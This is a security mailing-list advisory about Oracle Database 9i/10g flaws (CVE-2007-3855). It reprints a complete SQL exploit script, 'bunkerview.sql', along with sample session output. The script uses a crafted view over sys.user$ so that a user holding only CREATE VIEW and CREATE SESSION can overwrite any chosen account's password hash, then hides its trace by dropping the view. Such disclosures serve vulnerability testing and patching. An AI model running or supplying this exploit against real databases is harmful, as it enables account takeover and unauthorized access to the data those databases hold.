[EXPL] Multiple Operations of Data via Views (DB17, INSERT, UPDATE, DELETE, Exploit)



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Multiple Operations of Data via Views (DB17, INSERT, UPDATE, DELETE,
Exploit)
------------------------------------------------------------------------


SUMMARY

Multiple unspecified vulnerabilities in Oracle Database 9.0.1.5+, 9.2.0.8,
9.2.0.8DV, 10.1.0.5, and 10.2.0.3 allows remote authenticated users to
have an unknown impact via SYS.DBMS_DRS in the DataGuard component (DB03),
SYS.DBMS_STANDARD in the PL/SQL component (DB10), MDSYS.RTREE_IDX in the
Spatial component (DB16), and SQL Compiler (DB17). The following exploit
code can be used to determine whether your Oracle server is vulnerable to
the vulnerabilities mentioned here.

DETAILS

Exploit:
--
-- bunkerview.sql
--
-- Oracle 9i/10g - evil view exploit (CVE-2007-3855)
-- Uses evil view to perform unauthorized password update
--
-- by Andrea "bunker" Purificato - http://rawlab.mindcreations.com
-- 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2
--
-- This code should be used only for LEGAL purpose!
-- ...and remember: use Oracle at your own risk ;-)
--
-- Thanks to security researchers all around the world...
-- Smarties rules (they know what I mean)! ;-D
--
--
-- SQL> select * from user_sys_privs;
--
-- USERNAME PRIVILEGE
ADM
-- ------------------------------ ----------------------------------------
---
-- TEST CREATE VIEW
NO
-- TEST CREATE SESSION
NO
--
-- SQL> select password from sys.user$ where name='TEST';
--
-- PASSWORD
-- ------------------------------
-- AAAAAAAAAAAAAAAA
--
-- SQL> @bunkerview
-- [+] bunkerview.sql - Evil view exploit for Oracle 9i/10g
(CVE-2007-3855)
-- [+] by Andrea "bunker" Purificato - http://rawlab.mindcreations.com
-- [+] 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2
--
-- Target username (default TEST):
--
-- View created.
--
-- old 1: update bunkerview set password='6D9FEAAB597EF01B' where
name='&the_user'
-- new 1: update bunkerview set password='6D9FEAAB597EF01B' where
name='TEST'
--
-- 1 row updated.
--
--
-- View dropped.
--
--
-- Commit complete.
--
-- SQL> select password from sys.user$ where name='TEST';
--
-- PASSWORD
-- ------------------------------
-- 6D9FEAAB597EF01B
--
set serveroutput on;
prompt [+] bunkerview.sql - Evil view exploit for Oracle 9i/10g
(CVE-2007-3855)
prompt [+] by Andrea "bunker" Purificato - http://rawlab.mindcreations.com
prompt [+] 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2
prompt
undefine the_user;
accept the_user char prompt 'Target username (default TEST): ' default
'TEST';
create or replace view bunkerview as
select x.name,x.password from sys.user$ x left outer join sys.user$ y on
x.name=y.name;
update bunkerview set password='6D9FEAAB597EF01B' where
name='&the_user';
drop view bunkerview;
commit;


ADDITIONAL INFORMATION

The information has been provided by Andrea "bunker" Purificato.
The original article can be found at: <http://rawlab.mindcreations.com/>
http://rawlab.mindcreations.com/



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [NT] Multiple Vulnerabilities in Foxmail Server
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Multiple vulnerabilities were found in Foxmail server, ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [UNIX] SoX ".WAV" ICRD and ISFT Buffer Overflow
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... SoX is a "universal sound sample translator". ... Both vulnerabilities are located inside the st_wavstartread. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [UNIX] LiteCommerce SQL Injection and Source Disclosure
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Two types of vulnerabilities have been discovered in ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [EXPL] Firefox Concurrency-Related Vulnerabilities
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Firefox Concurrency-Related Vulnerabilities ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [NT] Lizardtech DjVu Browser Plug-in Multiple Vulnerabilities
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Lizardtech DjVu Browser Plug-in Multiple Vulnerabilities ... The DjVu Browser Plug-in is "the primary means of viewing DjVu documents. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)